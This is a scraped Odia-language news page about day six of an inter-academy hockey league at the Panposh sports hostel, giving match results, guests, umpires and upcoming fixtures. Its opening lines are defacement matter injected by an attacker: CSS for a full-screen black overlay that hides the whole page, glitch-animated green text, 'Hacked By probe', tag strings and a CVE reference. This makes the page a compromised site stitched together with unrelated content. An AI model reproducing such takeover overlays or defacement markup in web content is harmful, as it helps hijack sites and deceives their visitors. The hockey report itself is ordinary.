html,body{margin:0!important;overflow:hidden!important}#hx-imp-overlay{position:fixed;inset:0;z-index:2147483647;background:#000;color:#0f0;font-family:monospace;display:flex;align-items:center;justify-content:center;text-align:center}#hx-imp-overlay .brand{font-size:clamp(3rem,12vw,8rem);font-weight:900;text-shadow:0 0 20px #0f0,0 0 60px #0f0;animation:hxgl 2.5s infinite}@keyframes hxgl{0%,94%,100%{transform:translate(0)}96%{transform:translate(-3px,2px)}98%{transform:translate(3px,-2px)}}
HXIMPNTKY4V9V
`58; Hacked By probe `68;
[ HXIMPntky4v9v ]
HXIMPntky4v9v
CVE-2026-49049 | import vector

ଆନ୍ତଃ ଏକାଡେମୀ ହକି ପ୍ରତିଯୋଗିତାର ଷଷ୍ଠ ଦିବସ

User Rating: 5 / 5

Star ActiveStar ActiveStar ActiveStar ActiveStar Active
 

ପାନପୋଷ କ୍ରୀଡ଼ା ଛାତ୍ରାବାସ ପରିସରରେ ଥିବା ଆଷ୍ଟ୍ରୋ ଟର୍ଫ୍‌ ହକି ପଡ଼ିଆରେ ଆନ୍ତଃ ଏକାଡେମୀ ହକି ଲିଗ୍‌ ପ୍ରତିଯୋଗିତାର ଷଷ୍ଠ ଦିନରେ ଦୁଇଟି ଖେଳ ଅନୁଷ୍ଠିତ ହୋଇଯାଇଛି। ଷଷ୍ଠ ଦିବସର ପ୍ରଥମ ଖେଳ  ପାନପୋଷ କ୍ରୀଡ଼ା ଛାତ୍ରାବାସ ଏବଂ ନୁଆଦିଲ୍ଲୀର ଜାତୀୟ ହକି ଏକାଡେମୀ ମଧ୍ୟରେ ହୋଇଥିଲା। ଏଥିରେ ପାନପୋଷ କ୍ରୀଡ଼ା ଛାତ୍ରାବାସ ଦଳ ପ୍ରାଧ୍ୟାନ୍ୟ ବିସ୍ତାର କରି ନୁଆଦିଲ୍ଲୀର ଜାତୀୟ ହକି ଏକାଡେମୀକୁ ୪-୨ ଗୋଲ୍‌ ବ୍ୟବଧାନରେ ହରାଇଥିଲା।  ଦ୍ୱିତୀୟ ଖେଳ ଭୋପାଳ ସ୍ଥିତ ହକି ଏକାଡେମୀ ଏବଂ ସେଲ୍‌ ହକି ଏକାଡେମୀ ମଧ୍ୟରେ ହୋଇଥିଲା। ସଂଘର୍ଷପୂର୍ଣ୍ଣ ରହିଥିବା ଏହି ଖେଳ ୧-୧ ଗୋଲ୍‌ରେ ଅମିମାଂଶିତ ରହିଥିଲା। ଜିଲ୍ଲା ପ୍ରଶାସନ ଓ ରାଜ୍ୟ କ୍ରୀଡ଼ା ବିଭାଗ ସହଯୋଗରେ ପାନପୋଷ କ୍ରୀଡ଼ା ସଙ୍ଗଠନ ପକ୍ଷରୁ ଆୟୋଜିତ ଏହି ଖେଳର ଚତୁର୍ଥ  ଦିନରେ ବରିଷ୍ଠ ହକି ପଶିକ୍ଷକ ସିଲ୍‌ଭେଷ୍ଟାର୍‌ ଟପ୍ପୋ, ଜାତୀୟ ହକି ପ୍ରଶିକ୍ଷକ ହରିହରନ ଓ ଶିବ ସୁନ୍ଦର ନାୟକ ଅତିଥିଭାବେ ଉପସ୍ଥିତ ରହି ଖେଳାଳୀମାନଙ୍କୁ ପ୍ରୋତ୍ସାହିତ କରିଥିଲେ। ଦୁଇଟିଯାକ ଖେଳକୁ ଜାତୀୟ ହକି ଅମ୍ପାୟାର୍‌ ରାଜନ ଏକ୍କା, ସୁମନ ଚୌଧୁରୀ, ପିଟର ସୋରେନ୍‌, ଆକାଶ ଏକ୍କା, ବିରାଜ ଟପ୍ନୋ, ଆକାଶ କୁଜୁର ଓ ରମନଦୀପ ଲାକ୍ରା ପରିଚାଳନା କରିଥିଲେ। ୨୭ ତାରିଖ ଦିନ ସୁନ୍ଦରଗଡ଼ ସାଇ(Sports Authority of India) କ୍ରୀଡ଼ା ଛାତ୍ରାବାସ ଓ ପାନପୋଷ କ୍ରୀଡ଼ା ଛାତ୍ରାବାସ ଏବଂ ନୁଆଦିଲ୍ଲୀର ଜାତୀୟ ହକି ଏକାଡେମୀ ଓ ଭୋପାଳ ସ୍ଥିତ ହକି ଏକାଡେମୀ ମଧ୍ୟରେ ଅନୁଷ୍ଠିତ ହେବ। ଏହି ଖେଳ ପରିଚାଳନାରେ ପାନପୋଷ କ୍ରୀଡ଼ା ଛାତ୍ରାବାସର କେଶବ ଚନ୍ଦ୍ର ସ୍ୱାଇଁଙ୍କ ସହିତ ଅନ୍ୟମାନେ ସହଯୋଗ କରିଥିଲେ। 

0
0
0
s2sdefault